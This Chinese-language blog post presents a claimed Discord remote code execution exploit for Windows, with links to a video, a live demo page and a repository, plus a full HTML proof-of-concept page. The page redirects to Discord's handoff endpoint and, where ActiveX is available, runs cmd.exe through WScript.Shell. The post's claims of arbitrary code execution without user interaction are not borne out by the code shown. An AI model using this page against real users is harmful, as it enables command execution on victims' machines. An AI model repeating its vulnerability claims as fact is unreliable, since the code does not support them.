Discord远程代码执行漏洞分析与验证

本文详细披露了Discord客户端存在的远程代码执行漏洞,包含完整的PoC代码和验证视频链接,通过特制HTML页面可实现在Windows系统上强制启动Discord并执行命令。

Discord远程代码执行概念验证

漏洞概述

该漏洞存在于Discord客户端中,攻击者可通过特制网页在Windows系统上实现远程代码执行。即使Discord应用未运行,该漏洞也能强制启动应用并执行恶意代码。

技术细节

概念验证视频

https://www.youtube.com/watch?v=dEGhIpIvBA0

漏洞验证页面

https://SleepTheGod.github.io/discord_rce.html

源代码仓库

https://github.com/SleepTheGod/Discord-RCE

PoC代码实现 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Redirecting...</title>
    <script>
        onload = function() {
            alert("LOL YOU SURE YOU KNOW WHAT YOU ARE DOING HERE CLICK OK TO POP DISCORD");
        };

        function getQueryParam(param) {
            const urlParams = new URLSearchParams(window.location.search);
            return urlParams.get(param);
        }

        function isValidPayload(payload) {
            // 添加payload验证逻辑,例如正则匹配
            const regex = /^[a-zA-Z0-9_-]+$/; // 示例:字母数字、下划线、连字符
            return regex.test(payload);
        }

        function openCmd() {
            try {
                var shell = new ActiveXObject("WScript.Shell");
                shell.run("cmd.exe");
            } catch (e) {
                alert("This action is not supported in this browser or is blocked for security reasons.");
            }
        }

        window.onload = function() {
            const payload = getQueryParam('payload');
            let targetUrl = 'https://discord.com/handoff';
            
            if (payload && isValidPayload(payload)) {
                targetUrl += `?payload=${encodeURIComponent(payload)}`;
                if (payload === 'openCmd' && window.ActiveXObject) {
                    openCmd();
                }
            }

            setTimeout(function() {
                window.location.href = targetUrl;
            }, 3000);
        }
    </script>
</head>
<body>
    <p>If you are not redirected automatically, <a id="redirectLink" href="https://discord.com/handoff">click here</a>.</p>
    <script>
        const payload = getQueryParam('payload');
        let targetUrl = 'https://discord.com/handoff';
        
        if (payload && isValidPayload(payload)) {
            targetUrl += `?payload=${encodeURIComponent(payload)}`;
            if (payload === 'openCmd' && window.ActiveXObject) {
                openCmd();
            }
        }

        document.getElementById('redirectLink').href = targetUrl;
    </script>
</body>
</html>

技术要点

  1. 攻击向量:通过Discord的handoff端点实现代码执行
  2. 平台限制:仅影响Windows系统
  3. 执行条件:无需用户交互,可强制启动Discord应用
  4. Payload验证:使用正则表达式进行输入验证
  5. 命令执行:通过ActiveXObject调用WScript.Shell执行系统命令

影响范围

该漏洞允许攻击者在受害者机器上远程执行任意代码,具有严重的安全风险。

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次